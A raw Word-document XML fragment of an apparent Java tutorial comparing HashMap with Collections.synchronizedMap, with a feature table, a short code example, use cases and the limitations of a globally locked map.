        </w:num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Difference between HashMap and Synchronized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gridCol w:w="3816"/>
        <w:gridCol w:w="3917"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D34DD9" w:rsidRPr="00D34DD9" w14:paraId="6D117354" w14:textId="77777777" w:rsidTr="00D34DD9">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04CF2141"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="193B5E0F"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HashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="159415B5" w14:textId="77777777" w:rsidR="00D34DD9" w:rsidRPr="00D34DD9" w:rsidRDefault="00D34DD9" w:rsidP="00360BD1">
            <w:pPr>
              <w:jc w:val="center"/>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SynchronizedHashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D34DD9" w:rsidRPr="00D34DD9" w14:paraId="6B3AAB38" w14:textId="77777777" w:rsidTr="00D34DD9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51824EA8"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Thread Safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F1067A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t thread-safe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0365961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Thread-safe (achieved by synchronizing methods)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D34DD9" w:rsidRPr="00D34DD9" w14:paraId="1F686044" w14:textId="77777777" w:rsidTr="00D34DD9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44C7612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lastRenderedPageBreak/>
              <w:t>Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FE6FEE5"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Fast (no synchronization)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BCD55F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lower due to synchronization on each method</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D34DD9" w:rsidRPr="00D34DD9" w14:paraId="2CCB3731" w14:textId="77777777" w:rsidTr="00D34DD9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0241E1A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Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3479978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ingle-threaded environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37B81A06"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Multi-threaded environments requiring synchronization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D34DD9" w:rsidRPr="00D34DD9" w14:paraId="77D2343D" w14:textId="77777777" w:rsidTr="00D34DD9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B11129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Null Keys/Values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29020E4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Allows one null key and multiple null values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EE9BBB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Allows one null key and multiple null values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D34DD9" w:rsidRPr="00D34DD9" w14:paraId="0A16CB83" w14:textId="77777777" w:rsidTr="00D34DD9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="562AF82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Implementation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="497FC57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s </w:t>
            </w:r>
            <w:r w:rsidRPr="00D34DD9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>HashTable</w:t>
            </w:r>
            <w:r w:rsidRPr="00D34DD9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> for storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45C74E6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s a </w:t>
            </w:r>
            <w:r w:rsidRPr="00D34DD9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>wrapped HashMap</w:t>
            </w:r>
            <w:r w:rsidRPr="00D34DD9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> with synchronized methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D34DD9" w:rsidRPr="00D34DD9" w14:paraId="6C6768F2" w14:textId="77777777" w:rsidTr="00D34DD9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="278A262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Synchronized Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79E562A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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70078AD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all public methods are synchronized)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D34DD9" w:rsidRPr="00D34DD9" w14:paraId="1E8B451A" w14:textId="77777777" w:rsidTr="00D34DD9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5632075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cy Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="584FB4E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Not suitable for concurrent updates</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04DC9D4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uitable for low to moderate concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D34DD9" w:rsidRPr="00D34DD9" w14:paraId="71F1F2F1" w14:textId="77777777" w:rsidTr="00D34DD9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FE6BDC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Fail-Fast Iterator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="320B522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throws ConcurrentModificationException)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="775AD032"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Yes (fails fast during concurrent modifications)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D34DD9" w:rsidRPr="00D34DD9" w14:paraId="4D18AC7B" w14:textId="77777777" w:rsidTr="00D34DD9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A01ED3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Alternative for High Concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66F6B6A4"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tHashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21C992F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ConcurrentHashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="469DC9D8"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pict w14:anchorId="3C8BF803">
          <v:rect id="_x0000_i7207" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E55312C"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1. Internal Working of SynchronizedHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154C265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ynchronizedHashMap is usually created using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2567009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Map&lt;String, Integer&gt; syncMap = Collections.synchronizedMap(new HashMap&lt;&gt;());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8F654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All the methods in SynchronizedHashMap are </w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wrapped in synchronized blocks</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, ensuring </w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only one thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can access them at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472DDB6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This </w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>global lock</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the entire map makes it inefficient for </w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high concurrency scenarios</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4547645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pict w14:anchorId="60B671D1">
          <v:rect id="_x0000_i7208" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE27BCF"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2. Code Example: HashMap vs SynchronizedHashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B4923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HashMap;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775AE00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Collections;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74529E9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import java.util.Map;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209B5D3A" w14:textId="77777777" w:rsidR="00D34DD9" w:rsidRPr="00D34DD9" w:rsidRDefault="00D34DD9" w:rsidP="00D34DD9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0354477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public class HashMapVsSynchronizedMap {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5346B8C9"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2BC9F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 HashMap (not thread-safe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EFFC7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Map&lt;String, Integer&gt; hashMap = new HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B65FF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hashMap.put("Apple", 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8C59AD"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hashMap.put("Banana", 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C591E9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HashMap: " + hashMap);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F81B91" w14:textId="77777777" w:rsidR="00D34DD9" w:rsidRPr="00D34DD9" w:rsidRDefault="00D34DD9" w:rsidP="00D34DD9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16465BE0"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 SynchronizedMap (thread-safe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243F5DD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Map&lt;String, Integer&gt; syncMap = Collections.synchronizedMap(new HashMap&lt;&gt;());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFEF2AB"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ncMap.put("Apple", 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B0587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ncMap.put("Banana", 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103FD9D4"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SynchronizedMap: " + syncMap);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C945DB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DD7061"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642D2D2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pict w14:anchorId="523939E3">
          <v:rect id="_x0000_i7209" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="342A0AEF"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3. Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF23D8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HashMap:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Suitable for </w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single-threaded applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where performance is critical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272F418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SynchronizedHashMap:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Useful in </w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multi-threaded environments</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>concurrent updates</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are minimal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF2B26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pict w14:anchorId="786EA6EF">
          <v:rect id="_x0000_i7210" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB441F7"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4. Limitations of SynchronizedHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D535AF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Performance Degradation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D4FB49"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Synchronization on the entire map causes performance to degrade in </w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high-concurrency scenarios</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1A7AE3"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Global Lock:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E9182E"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Multiple threads cannot read/write simultaneously, unlike </w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A515BA6"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Inconsistent Iteration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E35DF53"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lastRenderedPageBreak/>
        <w:t>Iterators still need to be synchronized manually:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C53BE9"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synchronized (syncMap) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10981B6F"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for (String key : syncMap.keySet()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3661373C"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System.out.println(key + ": " + syncMap.get(key));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A90BE54"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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE28BEF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671F2D7C"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Blocking Nature:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3220C9D6" w14:textId="77777777" w:rsidR="00D34DD9" w:rsidRPr="00D34DD9" w:rsidRDefault="00D34DD9" w:rsidP="00D34DD9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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While one thread is updating, all other threads attempting to read are </w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocked</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEBDDC7"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pict w14:anchorId="48070720">
          <v:rect id="_x0000_i7211" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A7D643" w14:textId="77777777" w:rsidR="00D34DD9" w:rsidRPr="00D34DD9" w:rsidRDefault="00D34DD9" w:rsidP="00D34DD9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5. When to Use SynchronizedHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D3A04F"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When you need a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>simple, thread-safe map</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
